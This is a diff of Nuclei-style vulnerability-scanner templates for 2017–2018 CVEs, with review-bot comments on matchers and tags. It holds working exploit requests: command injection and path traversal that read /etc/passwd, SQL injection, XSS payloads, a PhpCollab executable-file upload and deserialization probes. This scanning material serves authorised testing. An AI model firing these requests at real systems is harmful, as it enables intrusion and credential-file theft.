CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2017-14535 cwe-id: CWE-78 - epss-score: 0.04456 - epss-percentile: 0.91511 - cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: netfortris - product: trixbox - tags: cve,cve2017,trixbox,rce,injection,edb + description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." -http: +requests: - raw: - | GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 
@@ -40,11 +28,11 @@ http: matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 -# digest: 4b0a00483046022100cc6f91ccb21bee7737472e19119f59099697e34db25bdadd9294c7200aced8fa022100a8cc01b81adc5ff8a8d53841aa9ce60f15f06e5372735648b552b2ea778c5d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-15647.yaml b/poc/cve/CVE-2017-15647.yaml index 05629c3502..b6d671f5a6 100644 --- a/poc/cve/CVE-2017-15647.yaml +++ b/poc/cve/CVE-2017-15647.yaml 
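Review bot: The passwd matcher is loosened from `root:.*:0:0:` to `root:.*:0:0`, which removes the delimiter after the GID field. With the greedy `.*` the new pattern also matches lines where `:0:0` is only a prefix of a longer value, so it is more prone to false positives than the line it replaces. I would keep the removed form, `- "root:.*:0:0:"`, or use the tighter `root:[x*]:0:0` that the CVE-2016-10367 template in this patch uses. The first hunk of this file also replaces the NVD, LinkedIn and Twitter references and the remediation text with a shorter block.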
@@ -1,42 +1,28 @@ id: CVE-2017-15647 - info: - name: FiberHome Routers - Local File Inclusion + name: FiberHome - Directory Traversal author: daffainfo severity: high - description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - remediation: | - Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability. + description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. reference: - https://www.exploit-db.com/exploits/44054 + - https://www.cvedetails.com/cve/CVE-2017-15647 - https://blogs.securiteam.com/index.php/archives/3472 - - https://nvd.nist.gov/vuln/detail/CVE-2017-15647 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-15647 cwe-id: CWE-22 - epss-score: 0.02013 - epss-percentile: 0.87618 - cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: fiberhome - product: routerfiberhome_firmware - tags: lfi,router,edb,cve,cve2017 - -http: + tags: cve,cve2017,lfi,router +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 490a0046304402205867c7c662e0149c13acdcd4a6fac9c5f3e57d07df8d37fd86d9f9019755b77702202897437e4c4c08ca0ca39bd2f60fb5e2789ba6b48169f56df40564a649ae58d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-15944.yaml b/poc/cve/CVE-2017-15944.yaml index f69b9b9ad5..5f276b5ce9 100644 --- a/poc/cve/CVE-2017-15944.yaml +++ b/poc/cve/CVE-2017-15944.yaml 
@@ -1,33 +1,46 @@ id: CVE-2017-15944 + info: name: Palo Alto Network PAN-OS - Remote Code Execution author: emadshanab,milo2012 severity: critical description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + remediation: | + Apply the latest security patches and updates provided by Palo Alto Networks. reference: - https://www.exploit-db.com/exploits/43342 - https://security.paloaltonetworks.com/CVE-2017-15944 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 + - http://www.securitytracker.com/id/1040007 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - tags: cve,cve2017,rce,vpn,panos,globalprotect -requests: + epss-score: 0.97344 + epss-percentile: 0.99871 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect + +http: - raw: - | GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID={{randstr}}; + matchers-condition: and matchers: - type: word part: body words: - "@start@Success@end@" + - type: status status: - 200 - -# Enhanced by mp on 2022/04/26 +# digest: 4a0a00473045022100e89db1ccfc85ce175e03a6e493147e60bd77f4c02339836e4c1a65c17800ede5022071057ee36f817d7de5ec8da10946ff99be8fccee48c3e4e8db0b1f378ad56735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-17451.yaml b/poc/cve/CVE-2017-17451.yaml index 4bef0d1456..0ce0fc0daf 100644 --- a/poc/cve/CVE-2017-17451.yaml +++ b/poc/cve/CVE-2017-17451.yaml 
@@ -1,50 +1,34 @@ id: CVE-2017-17451 - info: - name: WordPress Mailster <=1.5.4 - Cross-Site Scripting + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - remediation: | - Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability. + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - https://wordpress.org/plugins/wp-mailster/#developers - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html - https://wpvulndb.com/vulnerabilities/8973 - - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-17451 cwe-id: CWE-79 - epss-score: 0.00178 - epss-percentile: 0.54969 - cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: wpmailster - product: wp_mailster - framework: wordpress - tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm - -http: + tags: cve,cve2017,wordpress,xss,wp-plugin +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word - part: body words: - "" - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a004730450221009ce2ec0fe2884b0fc2519c502b9652c81c4b5af8261348ce9e18b8c786b9bf1902207b5b958f973ac31839ce86a76cc228a6b3dfd0ed0a118fa240bc075f28c5a53d:922c64590222798bb761d5b6d8e72950 
\ No newline at end of file
diff --git a/poc/cve/CVE-2017-18536.yaml b/poc/cve/CVE-2017-18536.yaml
index 47b3559ca4..931dee4892 100644
--- a/poc/cve/CVE-2017-18536.yaml
+++ b/poc/cve/CVE-2017-18536.yaml
@@ -1,49 +1,32 @@ id: CVE-2017-18536 - info: - name: WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting. - remediation: | - Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability. + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - https://wordpress.org/plugins/stop-user-enumeration/#developers - - https://nvd.nist.gov/vuln/detail/CVE-2017-18536 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-18536 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36961 - cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: fullworks - product: stop_user_enumeration - framework: wordpress - tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin - -http: + tags: cve,cve2017,wordpress,xss,wp-plugin +requests: - method: GET path: - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - "" - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a004730450221008c88f13becf164ac21e06f7177a85f48c44c02c0960e086609230a1fa9d1db2a022004a5345b57d8cc2f1bc4823b054526e2c80ca6c89c03069511d9afbcd15c242a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-3528.yaml b/poc/cve/CVE-2017-3528.yaml index 1681ef3ca7..6b985fcdae 100644 --- a/poc/cve/CVE-2017-3528.yaml 
+++ b/poc/cve/CVE-2017-3528.yaml 
@@ -1,40 +1,28 @@ id: CVE-2017-3528 - info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko severity: medium description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.' - remediation: | - Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability. 
reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - - http://www.securitytracker.com/id/1038299 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-3528 cwe-id: CWE-601 - epss-score: 0.00865 - epss-percentile: 0.80439 - cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: oracle - product: applications_framework - tags: oracle,redirect,edb,cve,cve2017 - -http: + tags: cve,cve2017,oracle,redirect +requests: - method: GET path: - - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh" - + - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" matchers: - type: word - part: body words: - - 'noresize src="/\interact.sh?configName=' -# digest: 4b0a004830460221008bf6cd9fdab2de27ac8173cdbe552438fff524c38a5695e4b08d93a0f7cd8900022100c6dd717f299ae64c7af43d4cec3bd3d389c98ca3ce188b670a4d93bbc179f052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 'noresize src="/\example.com?configName=' + part: body + +# Enhanced by mp on 2022/04/14 diff --git a/poc/cve/CVE-2017-5521.yaml b/poc/cve/CVE-2017-5521.yaml index 1ec3a1db53..6c4e70b523 100644 --- a/poc/cve/CVE-2017-5521.yaml +++ b/poc/cve/CVE-2017-5521.yaml 
@@ -6,23 +6,31 @@ info: severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - - https://www.cvedetails.com/cve/CVE-2017-5521/ + - https://www.exploit-db.com/exploits/41205/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 - tags: cve,cve2017,auth-bypass,netgear,router + epss-score: 0.97402 + epss-percentile: 0.99906 + cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netgear + product: r6200_firmware + tags: cve,cve2017,auth-bypass,netgear,router,kev -requests: +http: - method: GET path: - - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei" + - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}" matchers-condition: and matchers: @@ -37,4 +45,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 490a0046304402200d97883d59665ec7e09f40a33f162e0b2e28ff8364049396cca461b1fe8cee07022052f03a0eb200bc31e62c40faa091730a01fc3093b2600357df52155a1cfa196a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2017-5631.yaml b/poc/cve/CVE-2017-5631.yaml index 39c6899af9..96858abc89 100644 --- a/poc/cve/CVE-2017-5631.yaml +++ b/poc/cve/CVE-2017-5631.yaml 
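Review bot: The added `cpe` and `product` point at `r6200_firmware`, a model the `description` in this hunk does not list (it names R8500, R8300, R7000, R6400 and others), so asset matching keyed on these fields would not line up with the devices the text says are affected. Presumably this is one entry taken from a longer affected-configuration list. A short comment above the `cpe` line, such as `# cpe is one of several affected firmware entries, see description`, would keep readers from treating it as the full scope. The matchers sit between the two hunks and are not visible here.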
@@ -1,34 +1,48 @@ id: CVE-2017-5631 + info: - name: CaseAware - Cross Site Scripting + name: KMCIS CaseAware - Cross-Site Scripting author: edoardottt severity: medium - description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. + description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + remediation: | + To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 - https://www.openbugbounty.org/incidents/228262/ - https://www.exploit-db.com/exploits/42042/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: cve,cve2017,xss,caseaware -requests: + epss-score: 0.00286 + epss-percentile: 0.65307 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: edb,cve,cve2017,xss,caseaware + +http: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word part: body words: - "'>" + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a0047304502207adca921e9e9d39999c61b491c7b05e46bdfdf5e116a7950f83ceadebb2efbd9022100d6e02b13d0633c905625f2bfb46b9d5a3f770f03941ac18208c79563c7a0a1e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-6090.yaml b/poc/cve/CVE-2017-6090.yaml index 7ed49da249..38352df854 100644 --- a/poc/cve/CVE-2017-6090.yaml 
+++ b/poc/cve/CVE-2017-6090.yaml @@ -1,34 +1,21 @@ id: CVE-2017-6090 info: - name: PhpColl 2.5.1 Arbitrary File Upload + name: PhpCollab (unauthenticated) Arbitrary File Upload author: pikpikcu severity: high - description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. - remediation: | - Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability. - reference: - - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - - https://www.exploit-db.com/exploits/42934/ + tags: cve,cve2017,phpcollab,rce,fileupload + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2017-6090 cwe-id: CWE-434 - epss-score: 0.9726 - epss-percentile: 0.99812 - cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: phpcollab - product: phpcollab - shodan-query: http.title:"PhpCollab" - tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive - -http: + description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." + +requests: - raw: - - | + - | # REQUEST 1 POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 
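Review bot: The new `tags` line drops `intrusive`, although this template's first raw request is a multipart POST to `clients/editclient.php` and its name says it uploads a file, so runs that exclude intrusive templates would now send it. Keep `tags: cve,cve2017,phpcollab,rce,fileupload,intrusive`. The new name also says "(unauthenticated)" while the description says "remote authenticated users" and the vector carries `PR:L`; the two should be reconciled. The CVE-2018-11231 hunk further down drops the same `intrusive` tag from a template that POSTs to an `update` route. The request body continues in the next hunk.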
@@ -40,8 +27,9 @@ http: -----------------------------154934846911423734231554128137-- - - | - GET /logos_clients/{{randstr}}.php HTTP/1.1 + + - | # REQUEST 2 + GET /logos_clients/1.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -54,4 +42,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0af277d4141b7383fb7caafc38b3dd1a971868da500b3800851c43d0fb2996902202ef9c2d271359f62e22aecb66dccc201a04aed839fff8cc3f6355e71e9782c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-8917.yaml b/poc/cve/CVE-2017-8917.yaml index 7bc43442b0..02c7417ed4 100644 --- a/poc/cve/CVE-2017-8917.yaml +++ b/poc/cve/CVE-2017-8917.yaml 
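Review bot: The second request now fetches a fixed `/logos_clients/1.php`, where the old side requested `{{randstr}}.php` to match the `id={{randstr}}` in the upload request. The multipart body is outside the hunk, so the stored file name cannot be confirmed from here. A fixed name nonetheless risks both missing the file this run created and matching a file that was already on the server, which gives wrong results in either direction. I would keep `GET /logos_clients/{{randstr}}.php HTTP/1.1`.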
@@ -1,29 +1,45 @@ id: CVE-2017-8917 + info: name: Joomla! <3.7.1 - SQL Injection author: princechaddha severity: critical description: | - Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors. + Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability. reference: - - https://www.cvedetails.com/cve/CVE-2017-8917/ - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - - http://www.securityfocus.com/bid/98515 + - https://nvd.nist.gov/vuln/detail/CVE-2017-8917 + - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522 - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 + epss-score: 0.97555 + epss-percentile: 0.99995 + cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: joomla + product: joomla\! 
+ shodan-query: http.component:"Joomla" tags: cve,cve2017,joomla,sqli -requests: +variables: + num: "999999999" + +http: - method: GET path: - - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" + - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)" + matchers: - type: word part: body words: - - "cf79ae6addba60ad018347359bd144d2" + - '{{md5(num)}}' -# Enhanced by mp on 2022/05/11 +# digest: 4a0a00473045022100adaa3221218bcfbbdfd74f148b4a127a8876f6467b6f43b0ac717cd45f00ffc6022015d114abf831c83a639225e19167c9472c0c041a7e948be8f9890603f9c27af6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2017-9805.yaml b/poc/cve/CVE-2017-9805.yaml index c60d7eebd9..c62b854a41 100644 --- a/poc/cve/CVE-2017-9805.yaml +++ b/poc/cve/CVE-2017-9805.yaml 
@@ -1,26 +1,38 @@ id: CVE-2017-9805 + info: name: Apache Struts2 S2-052 - Remote Code Execution author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + - http://www.securitytracker.com/id/1039263 + - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - tags: cve,cve2017,apache,rce,struts -requests: + epss-score: 0.97545 + epss-percentile: 0.99994 + cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: struts + tags: cve,cve2017,apache,rce,struts,kev + +http: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" - headers: - Content-Type: application/xml + body: | @@ -79,6 +91,10 @@ requests: + + headers: + Content-Type: application/xml + matchers-condition: and matchers: - type: word @@ -86,8 +102,9 @@ requests: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and + - type: status status: - 500 -# Enhanced by mp on 2022/04/20 +# digest: 4b0a00483046022100fffb5572ea6a3a9e66caeba001ac48de1a809db496abc1d5367643a27b64e550022100e7862b50988b1084007910376221f62bcb95de32c3bd50681d323f776c17ecd5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2017-9822.yaml b/poc/cve/CVE-2017-9822.yaml index 09de04f19d..35f81b943b 100644 
--- a/poc/cve/CVE-2017-9822.yaml +++ b/poc/cve/CVE-2017-9822.yaml @@ -1,19 +1,32 @@ id: CVE-2017-9822 info: - name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution author: milo2012 severity: high - description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) - tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization - reference: https://github.com/murataydemir/CVE-2017-9822 + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. + remediation: | + Upgrade DotNetNuke to a version higher than 9.3.0 + reference: + - https://github.com/murataydemir/CVE-2017-9822 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 + - http://www.dnnsoftware.com/community/security/security-center + - http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 + epss-score: 0.96098 + epss-percentile: 0.99351 + cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: packetstorm,cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev -requests: +http: - raw: - | GET /__ HTTP/1.1 @@ -25,12 +38,13 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '[extensions]' - 'for 16-bit app support' - part: body condition: and - type: status status: - 404 +# digest: 490a00463044022028e736e04ef7b6dbf11400c0f0aa927a20e9be5eefdd8e59dd02446f884083550220153659a881d37a3d8018dd48be2f5c22db9ff2136f662c961f9dada95ad445e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2018-0101.yaml b/poc/cve/CVE-2018-0101.yaml index 617dcbd20c..c737a701c8 100644 --- a/poc/cve/CVE-2018-0101.yaml +++ b/poc/cve/CVE-2018-0101.yaml @@ -1,4 +1,5 @@ id: cve-2018-0101 + info: name: Cisco ASA Denial-of-Service # Leads to RCE author: dwisiswant0 @@ -9,12 +10,14 @@ info: remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. tags: cve,cve2018,cisco,dos,rce + requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* + - | POST / HTTP/1.1 Host: {{Hostname}} @@ -31,12 +34,14 @@ requests: A + req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" + - type: dsl dsl: - "status_code_2 == 500" @@ -44,4 +49,4 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or + condition: or \ No newline at end of file diff --git a/poc/cve/CVE-2018-1000226.yaml b/poc/cve/CVE-2018-1000226.yaml index 42c35970d8..9ebcf5d7e6 100644 --- a/poc/cve/CVE-2018-1000226.yaml +++ b/poc/cve/CVE-2018-1000226.yaml 
@@ -1,31 +1,19 @@ id: CVE-2018-1000226 - info: - name: Cobbler - Authentication Bypass + name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass author: c-sh0 - severity: critical - description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + severity: critical + tags: cve,cve2018,cobbler,auth-bypass classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - epss-score: 0.01552 - epss-percentile: 0.85736 - cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cobblerd - product: cobbler - tags: cve,cve2018,cobbler,auth-bypass - -http: +requests: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 
@@ -34,38 +22,30 @@ http: - _CobblerXMLRPCInterface__make_token - - - - cobbler - - - + _CobblerXMLRPCInterface__make_token + + + cobbler + + - matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - + - type: status + status: + - 200 - type: word part: header words: - "Content-Type: text/xml" - - type: word part: body words: - "" - + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" - - - type: status - status: - - 200 -# digest: 4b0a0048304602210082bc211041a4f7ff8fcf41cb56b1450d7706cc105dd6358cbfe2d6d6cb3a365c022100ad4927015824ad322d9d2c2b8d40d9852b469e51c45d5300b7313836b216f37f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-1000856.yaml b/poc/cve/CVE-2018-1000856.yaml index 836d88b898..6641b1a909 100644 --- a/poc/cve/CVE-2018-1000856.yaml +++ b/poc/cve/CVE-2018-1000856.yaml @@ -1,10 +1,13 